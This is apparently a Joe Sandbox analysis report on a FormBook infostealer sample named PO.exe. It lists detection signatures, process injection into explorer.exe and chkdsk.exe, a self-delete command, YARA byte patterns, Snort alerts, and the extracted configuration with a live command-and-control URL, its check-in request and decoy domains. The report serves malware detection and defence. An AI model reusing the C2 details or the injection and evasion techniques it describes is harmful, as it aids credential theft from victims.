Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report PO.exe

Overview

General Information

Sample Name:PO.exe
Analysis ID:383909
MD5:ba83b33d39ca6c3bf1f311d1b6a38d1a
SHA1:ce0bcbb882b1a2105138b9955c1d892e4c6f0947
SHA256:ce27bdaa30fc5a712b41888b529f52c87f90b9d196b975d47ec9b5236b48cebc
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Contains functionality to prevent local Windows debugging
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • PO.exe (PID: 5720 cmdline: 'C:\Users\user\Desktop\PO.exe' MD5: BA83B33D39CA6C3BF1F311D1B6A38D1A)
    • PO.exe (PID: 2904 cmdline: 'C:\Users\user\Desktop\PO.exe' MD5: BA83B33D39CA6C3BF1F311D1B6A38D1A)
      • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • chkdsk.exe (PID: 1716 cmdline: C:\Windows\SysWOW64\chkdsk.exe MD5: 2D5A2497CB57C374B3AE3080FF9186FB)
          • cmd.exe (PID: 4500 cmdline: /c del 'C:\Users\user\Desktop\PO.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 1260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.riceandginger.com/fcn/"], "decoy": ["bellee-select.com", "unlock-motorola.com", "courtneyrunyon.com", "hnzywjz.com", "retrievingbest.net", "ayescarrental.com", "beyoutifulblessings.com", "heritagediscovery.net", "fasoum.com", "wbz.xyz", "lownak.com", "alinkarmay.com", "coffeyquiltco.com", "validdreamers.com", "yuksukcu.club", "buildnextfrc.com", "avantfarme.com", "xyfs360.com", "holisticpacific.com", "banejia.com", "champsn.com", "ebitit.com", "esseneceedibles.com", "findmyautoparts.com", "belenusadvisory.net", "esrise.net", "lovewillfindaway.net", "chienluocmarketing.net", "greenbelieve.com", "shopyourgift.com", "theweddingofshadiandmike.com", "greenstavern.com", "klinku.com", "norastravel.com", "team5thgroup.com", "ohrchadash.com", "hauteandcood.com", "ap-333.com", "jonathantyar.com", "robertabraham.com", "citestaccnt1597691130.com", "665asilo.com", "deerokoj.com", "ezcovid19.com", "heritageivhoa.com", "ultraprecisiondata.com", "alkiefsaudi.com", "camelliaflowers.space", "clickqrcoaster.com", "ponorogokita.com", "stainlesslion.com", "china-ymc.com", "littner.xyz", "houseof2.com", "metabolytix.com", "1000-help6.club", "another-sc.com", "suafrisolac.com", "whitetreechainmail.com", "amazon-service-app-account.com", "cruiseameroca.com", "yaxett.net", "adsmat.com", "afternoontravel.site"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.240240233.0000000002670000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000000.00000002.240240233.0000000002670000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000000.00000002.240240233.0000000002670000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
    00000008.00000002.495059747.0000000000200000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000008.00000002.495059747.0000000000200000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 16 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.2.PO.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.2.PO.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.2.PO.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17609:$sqlite3step: 68 34 1C 7B E1
        • 0x1771c:$sqlite3step: 68 34 1C 7B E1
        • 0x17638:$sqlite3text: 68 38 2A 90 C5
        • 0x1775d:$sqlite3text: 68 38 2A 90 C5
        • 0x1764b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17773:$sqlite3blob: 68 53 D8 7F 8C
        1.2.PO.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.2.PO.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000000.00000002.240240233.0000000002670000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.riceandginger.com/fcn/"], "decoy": ["bellee-select.com", "unlock-motorola.com", "courtneyrunyon.com", "hnzywjz.com", "retrievingbest.net", "ayescarrental.com", "beyoutifulblessings.com", "heritagediscovery.net", "fasoum.com", "wbz.xyz", "lownak.com", "alinkarmay.com", "coffeyquiltco.com", "validdreamers.com", "yuksukcu.club", "buildnextfrc.com", "avantfarme.com", "xyfs360.com", "holisticpacific.com", "banejia.com", "champsn.com", "ebitit.com", "esseneceedibles.com", "findmyautoparts.com", "belenusadvisory.net", "esrise.net", "lovewillfindaway.net", "chienluocmarketing.net", "greenbelieve.com", "shopyourgift.com", "theweddingofshadiandmike.com", "greenstavern.com", "klinku.com", "norastravel.com", "team5thgroup.com", "ohrchadash.com", "hauteandcood.com", "ap-333.com", "jonathantyar.com", "robertabraham.com", "citestaccnt1597691130.com", "665asilo.com", "deerokoj.com", "ezcovid19.com", "heritageivhoa.com", "ultraprecisiondata.com", "alkiefsaudi.com", "camelliaflowers.space", "clickqrcoaster.com", "ponorogokita.com", "stainlesslion.com", "china-ymc.com", "littner.xyz", "houseof2.com", "metabolytix.com", "1000-help6.club", "another-sc.com", "suafrisolac.com", "whitetreechainmail.com", "amazon-service-app-account.com", "cruiseameroca.com", "yaxett.net", "adsmat.com", "afternoontravel.site"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: PO.exeVirustotal: Detection: 15%Perma Link
          Source: PO.exeReversingLabs: Detection: 14%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000000.00000002.240240233.0000000002670000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.495059747.0000000000200000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.281309352.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.281955301.0000000000CF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.281979783.0000000000D20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.496196901.0000000004B30000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.235598141.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.PO.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.PO.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.PO.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.PO.exe.2670000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.PO.exe.2670000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.PO.exe.400000.0.unpack, type: UNPACKEDPE
          Source: 1.2.PO.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 8.2.chkdsk.exe.2a5660.2.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 8.2.chkdsk.exe.54ef834.5.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.2.PO.exe.2670000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.1.PO.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: PO.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: C:\xampp\htdocs\Cryptor\a3aea962689945e0b965ec319b5ccdaa\Loader\Loader\Release\16znhx5gg.pdb source: PO.exe, 00000000.00000002.240861204.0000000073CA2000.00000002.00020000.sdmp, gif000d.dll.0.dr
          Source: Binary string: chkdsk.pdbGCTL source: PO.exe, 00000001.00000002.282154751.0000000002650000.00000040.00000001.sdmp
          Source: Binary string: chkdsk.pdb source: PO.exe, 00000001.00000002.282154751.0000000002650000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: PO.exe, 00000000.00000003.232569339.000000001EFD0000.00000004.00000001.sdmp, PO.exe, 00000001.00000002.281671216.0000000000ADF000.00000040.00000001.sdmp, chkdsk.exe, 00000008.00000002.497156731.0000000004F9F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: PO.exe, chkdsk.exe, 00000008.00000002.497156731.0000000004F9F000.00000040.00000001.sdmp
          Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,0_2_00405301
          Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,0_2_00405C94
          Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_004026BC FindFirstFileA,0_2_004026BC
          Source: C:\Users\user\Desktop\PO.exeCode function: 4x nop then pop esi1_2_004172F0
          Source: C:\Users\user\Desktop\PO.exeCode function: 4x nop then pop esi1_1_004172F0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4x nop then pop esi8_2_04B472F0

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49727 -> 162.241.24.122:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49727 -> 162.241.24.122:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49727 -> 162.241.24.122:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.riceandginger.com/fcn/
          Source: global trafficHTTP traffic detected: GET /fcn/?8p4=IIapObjlcsmN/tTUXuiVJ6SvcAdYVsMSy0eMvzJ/vGgposGY5YkWehqMwppvssjWa3vK&sZCp=0btLwJX8eFdTeVr HTTP/1.1Host: www.riceandginger.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewASN Name: AS-CHOOPAUS AS-CHOOPAUS
          Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
          Source: global trafficHTTP traffic detected: GET /fcn/?8p4=IIapObjlcsmN/tTUXuiVJ6SvcAdYVsMSy0eMvzJ/vGgposGY5YkWehqMwppvssjWa3vK&sZCp=0btLwJX8eFdTeVr HTTP/1.1Host: www.riceandginger.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.ayescarrental.com
          Source: explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_00404EA0 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,lstrlenA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404EA0

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000000.00000002.240240233.0000000002670000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.495059747.0000000000200000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.281309352.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.281955301.0000000000CF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.281979783.0000000000D20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.496196901.0000000004B30000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.235598141.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.PO.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.PO.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.PO.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.PO.exe.2670000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.PO.exe.2670000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.PO.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000000.00000002.240240233.0000000002670000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.240240233.0000000002670000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.495059747.0000000000200000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.495059747.0000000000200000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.281309352.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.281309352.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.281955301.0000000000CF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.281955301.0000000000CF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.281979783.0000000000D20000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.281979783.0000000000D20000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.496196901.0000000004B30000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.496196901.0000000004B30000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000001.235598141.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.235598141.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.PO.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.PO.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.PO.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.PO.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.PO.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.PO.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.PO.exe.2670000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.PO.exe.2670000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.PO.exe.2670000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.PO.exe.2670000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.PO.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.PO.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00419D60 NtCreateFile,1_2_00419D60
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00419E10 NtReadFile,1_2_00419E10
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00419E90 NtClose,1_2_00419E90
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00419F40 NtAllocateVirtualMemory,1_2_00419F40
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00419DB3 NtReadFile,1_2_00419DB3
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00419E8A NtClose,1_2_00419E8A
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00419F3B NtAllocateVirtualMemory,1_2_00419F3B
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A298F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_00A298F0
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A29860 NtQuerySystemInformation,LdrInitializeThunk,1_2_00A29860
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A29840 NtDelayExecution,LdrInitializeThunk,1_2_00A29840
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A299A0 NtCreateSection,LdrInitializeThunk,1_2_00A299A0
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A29910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_00A29910
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A29A20 NtResumeThread,LdrInitializeThunk,1_2_00A29A20
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A29A00 NtProtectVirtualMemory,LdrInitializeThunk,1_2_00A29A00
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A29A50 NtCreateFile,LdrInitializeThunk,1_2_00A29A50
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A295D0 NtClose,LdrInitializeThunk,1_2_00A295D0
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A29540 NtReadFile,LdrInitializeThunk,1_2_00A29540
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A296E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_00A296E0
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A29660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_00A29660
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A297A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_00A297A0
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A29780 NtMapViewOfSection,LdrInitializeThunk,1_2_00A29780
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A29710 NtQueryInformationToken,LdrInitializeThunk,1_2_00A29710
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A298A0 NtWriteVirtualMemory,1_2_00A298A0
